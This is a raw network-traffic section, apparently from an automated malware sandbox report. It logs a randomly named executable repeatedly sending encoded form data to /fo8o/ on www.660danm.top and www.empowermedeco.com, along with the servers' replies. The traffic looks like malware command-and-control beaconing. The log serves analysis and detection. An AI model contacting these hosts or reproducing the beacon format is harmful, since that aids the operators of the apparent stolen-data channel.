                                                                                                  Data Raw: 46 42 45 64 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6b 38 49 71 59 6a 43 7a 72 6b 6e 71 78 6c 42 78 35 70 5a 6a 48 37 48 51 6f 33 33 56 6e 4e 4a 72 64 76 4c 2b 69 6b 6b 4f 71 77 75 78 48 64 32 43 33 33 31 45 37 55 6c 43 70 79 65 5a 55 37 2f 37 62 31 55 47 42 61 6e 55 50 36 50 66 52 70 71 53 54 70 39 69 47 4a 68 2f 4a 45 41 4f 6f 74 78 50 51 53 71 30 43 62 44 6e 33 4c 32 45 2b 63 6f 35 56 39 67 76 6f 71 6b 79 49 6e 54 43 69 35 73 55 55 30 64 55 73 32 39 38 48 55 79 30 33 4e 46 66 35 44 6f 4e 56 58 53 66 4f 2f 32 5a 57 79 63 69 6a 57 4a 56 31 51 74 39 6c 79 61 38 51 48 51 4c
                                                                                                  Data Ascii: FBEd=gB7R/rxgLjsQk8IqYjCzrknqxlBx5pZjH7HQo33VnNJrdvL+ikkOqwuxHd2C331E7UlCpyeZU7/7b1UGBanUP6PfRpqSTp9iGJh/JEAOotxPQSq0CbDn3L2E+co5V9gvoqkyInTCi5sUU0dUs298HUy03NFf5DoNVXSfO/2ZWycijWJV1Qt9lya8QHQL
                                                                                                  May 8, 2024 10:51:28.584340096 CEST728INHTTP/1.1 405 Not Allowed
                                                                                                  Server: nginx/1.20.2
                                                                                                  Date: Wed, 08 May 2024 08:51:28 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 559
                                                                                                  Via: 1.1 google
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED]
                                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  34192.168.2.104974534.111.148.214801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:51:30.975128889 CEST782OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.660danm.top
                                                                                                  Origin: http://www.660danm.top
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 217
                                                                                                  Referer: http://www.660danm.top/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 74 72 64 50 62 2b 6a 6e 38 4f 70 77 75 78 49 39 32 62 6f 48 31 4e 37 55 70 4b 70 79 79 5a 55 37 62 37 62 77 77 47 42 70 2f 54 4a 36 50 64 64 4a 71 51 63 4a 39 69 47 4a 68 2f 4a 45 45 30 6f 74 35 50 51 69 36 30 44 34 62 67 72 62 32 44 33 38 6f 35 66 64 67 72 6f 71 6b 55 49 6d 2f 34 69 36 45 55 55 32 46 55 73 45 46 37 4e 55 79 2b 36 74 45 31 39 54 5a 35 4d 6c 4b 42 57 4d 57 43 49 41 63 39 6b 33 6f 53 6b 42 4d 71 32 46 47 79 65 42 6c 68 42 33 43 53 6c 6c 63 6e 69 53 71 4d 35 6a 6d 46 51 43 74 2b 66 77 3d 3d
                                                                                                  Data Ascii: FBEd=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/trdPb+jn8OpwuxI92boH1N7UpKpyyZU7b7bwwGBp/TJ6PddJqQcJ9iGJh/JEE0ot5PQi60D4bgrb2D38o5fdgroqkUIm/4i6EUU2FUsEF7NUy+6tE19TZ5MlKBWMWCIAc9k3oSkBMq2FGyeBlhB3CSllcniSqM5jmFQCt+fw==
                                                                                                  May 8, 2024 10:51:31.275866032 CEST728INHTTP/1.1 405 Not Allowed
                                                                                                  Server: nginx/1.20.2
                                                                                                  Date: Wed, 08 May 2024 08:51:31 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 559
                                                                                                  Via: 1.1 google
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED]
                                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  35192.168.2.104974634.111.148.214801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:51:33.665349007 CEST1795OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.660danm.top
                                                                                                  Origin: http://www.660danm.top
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 1229
                                                                                                  Referer: http://www.660danm.top/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 6c 72 64 38 44 2b 6a 47 38 4f 6f 77 75 78 46 64 32 47 6f 48 30 4e 37 56 42 4f 70 79 4f 6a 55 35 54 37 61 57 38 47 48 63 54 54 63 4b 50 64 56 70 71 64 54 70 39 33 47 4e 46 37 4a 45 30 30 6f 74 35 50 51 6b 57 30 45 72 44 67 70 62 32 45 2b 63 6f 31 56 39 67 54 6f 71 39 68 49 6d 36 61 69 4b 6b 55 55 57 56 55 2f 48 39 37 42 55 79 77 39 74 45 74 39 54 56 6d 4d 6c 57 6a 57 4e 7a 58 49 43 4d 39 68 52 46 51 68 41 4d 57 6b 30 57 32 58 33 6f 4b 47 79 6d 41 67 57 78 59 69 6a 2b 67 37 7a 6e 37 5a 6a 64 78 4d 41 4c 49 6f 72 4f 47 53 63 44 63 57 73 6a 55 47 63 58 65 7a 52 68 39 4e 42 4c 31 4c 31 58 78 39 49 4b 55 6c 62 34 44 77 33 36 37 49 69 6a 4a 4b 69 58 76 7a 73 7a 68 5a 4e 74 54 53 6e 6f 71 39 7a 49 56 52 78 46 2b 6d 48 30 71 4f 61 63 78 37 4b 71 50 36 58 4d 41 72 49 30 30 52 6b 2b 58 57 34 33 57 7a 4b 46 53 47 4a 63 67 33 34 55 67 36 58 43 74 74 76 4f 70 59 48 44 73 32 [TRUNCATED]
                                                                                                  Data Ascii: FBEd=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/lrd8D+jG8OowuxFd2GoH0N7VBOpyOjU5T7aW8GHcTTcKPdVpqdTp93GNF7JE00ot5PQkW0ErDgpb2E+co1V9gToq9hIm6aiKkUUWVU/H97BUyw9tEt9TVmMlWjWNzXICM9hRFQhAMWk0W2X3oKGymAgWxYij+g7zn7ZjdxMALIorOGScDcWsjUGcXezRh9NBL1L1Xx9IKUlb4Dw367IijJKiXvzszhZNtTSnoq9zIVRxF+mH0qOacx7KqP6XMArI00Rk+XW43WzKFSGJcg34Ug6XCttvOpYHDs2LgqPSxA4udmxAnzbTYJZfcIAsFH5RRH1G91uuA7xVssKePfPt5D/p8or1ojF02/cgD4sFpbSKJAeoVT72CpPcmbFGjxk/HMXjqNO9Go1JFJZIb7C/vqyzzezR78iUGbKriLN/lhtw2Oqzl7bEn4IqLIo6eUN3DX2CkUc0Nu/IFP0H926IRfCkeRmWgiRWvJLSyX9sK7WuuBo2sVqxWRXXCNfSaUNDv+i7R/uLzdCp/Zu/wXFfJuyv7XiqknQvXJwGsEPU6lpIkEQvr6crmt+OVgV6WUzJkZPdDRX88zO1iavYxoxmstihAN1OaDBQAIZ7loBuGXF415e6vEJr8r6ytf9B7MoQBLLZQm4x3e9S+9beMRVIDMKGgsAF69bdtg0em1RNvyRRXy/PjB+YWfq1A6fyG+f5LijMChAD8Sc/TaP32E0uWz9HaTxav804K0n3ScbOwD6nBMjjqA2UL66RzfuMVbYARlSSppQgN0dr6FDGU8WoO6x1077/8XekpGRtbTDF9fHwpa1nUvfgcl16qVlcuvYF9US6ISx+hvdDEQ2qUNrDX0jEuN64s+ZXadNrIHDv2zNRefpYFPkPYJ1zUjDXvPrjtBzh4uTR0gxNq6pDO01lC6TQhQABFoCCC+rzDWc+Y/N57TmWJFzqf2xRcAXiNNqiJ7p7I [TRUNCATED]
                                                                                                  May 8, 2024 10:51:33.965671062 CEST728INHTTP/1.1 405 Not Allowed
                                                                                                  Server: nginx/1.20.2
                                                                                                  Date: Wed, 08 May 2024 08:51:33 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 559
                                                                                                  Via: 1.1 google
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED]
                                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  36192.168.2.104974734.111.148.214801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:51:36.443835020 CEST497OUTGET /fo8o/?4h8=YPQX8Tch&FBEd=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrIKb5dMy/A4l/RoFCElkJ//A4REmieQ== HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Host: www.660danm.top
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  May 8, 2024 10:51:36.752778053 CEST1289INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.20.2
                                                                                                  Date: Wed, 08 May 2024 08:51:36 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 5161
                                                                                                  Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                                                                                  Vary: Accept-Encoding
                                                                                                  ETag: "65a4939c-1429"
                                                                                                  Cache-Control: no-cache
                                                                                                  Accept-Ranges: bytes
                                                                                                  Via: 1.1 google
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 [TRUNCATED]
                                                                                                  Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.42.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function ba
                                                                                                  May 8, 2024 10:51:36.752791882 CEST1289INData Raw: 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba a6 e7 bb
                                                                                                  Data Ascii: iduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send(n)
                                                                                                  May 8, 2024 10:51:36.752808094 CEST210INData Raw: 2e 70 75 73 68 28 22 22 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 69 29 2c 22 3d 22 29 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 5b 69 5d 29 29 29 3b 76 61 72 20 63
                                                                                                  Data Ascii: .push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncps
                                                                                                  May 8, 2024 10:51:36.755567074 CEST1289INData Raw: 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72
                                                                                                  Data Ascii: sntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":
                                                                                                  May 8, 2024 10:51:36.755585909 CEST1289INData Raw: 29 2c 24 68 65 61 64 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 24 73 63 72 69 70 74 31 2c 24 68 65 61 64 2e 6c 61 73 74 43 68 69 6c 64 29 2c 24 73 63 72 69 70 74 31 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 64 6f
                                                                                                  Data Ascii: ),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.inser
                                                                                                  May 8, 2024 10:51:36.755589962 CEST95INData Raw: 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 33 6f 2f 62 65 72 67 2f 73 74 61 74 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 65 39 36 64 63 36 64 63 36 38 36 33 38 33 35 66 34 61 64 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c
                                                                                                  Data Ascii: mage.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  37192.168.2.1049748217.196.55.202801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:51:43.627485991 CEST776OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.empowermedeco.com
                                                                                                  Origin: http://www.empowermedeco.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 193
                                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 50 51 59 6b 65 69 62 72 4b 66 65 4a 78 77 67 45 42 75 48 57 57 64 33 7a 48 6a 6f
                                                                                                  Data Ascii: FBEd=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuPQYkeibrKfeJxwgEBuHWWd3zHjo
                                                                                                  May 8, 2024 10:51:43.833847046 CEST1070INHTTP/1.1 301 Moved Permanently
                                                                                                  Connection: close
                                                                                                  content-type: text/html
                                                                                                  content-length: 795
                                                                                                  date: Wed, 08 May 2024 08:51:43 GMT
                                                                                                  server: LiteSpeed
                                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                                  platform: hostinger
                                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  38192.168.2.1049749217.196.55.202801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:51:46.361790895 CEST800OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.empowermedeco.com
                                                                                                  Origin: http://www.empowermedeco.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 217
                                                                                                  Referer: http://www.empowermedeco.com/fo8o/
